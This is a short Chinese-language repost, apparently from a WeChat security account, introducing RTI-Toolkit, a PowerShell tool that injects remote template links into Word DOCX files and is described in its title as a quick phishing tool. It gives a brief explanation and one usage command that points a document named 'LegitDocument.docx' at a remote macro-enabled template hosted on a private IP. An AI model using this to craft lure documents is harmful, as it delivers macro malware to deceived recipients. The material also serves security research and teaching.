RTI-Toolkit 是一个用于远程模板注入攻击的开源 PowerShell 工具包。该工具包包含一个名为 PS-Templator.ps1 的 PowerShell 脚本,可以从攻击和防御的角度使用。
PS-Templator.ps1 仅支持 DOCX 文件。Microsoft Office 上下文中的远程模板注入 (RTI) 是指可通过 Office 文档(例如 Word、Excel、PowerPoint)中的恶意模板利用的特定类型的安全漏洞。例如,在 DOCX 文件中,内容以 XML 格式存储在存档中,其中一些 XML 文件可能引用外部资源或模板。攻击者确实可以操纵这些 XML 文件来插入可能利用漏洞或欺骗用户的恶意链接或内容。这是基于宏的攻击。
加载模块
Import-Module .PS-Templator.ps1
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:UsersUserDesktopLegitDocument.docx
原文始发于微信公众号(Enginge):RTI-Toolkit-快速钓鱼工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论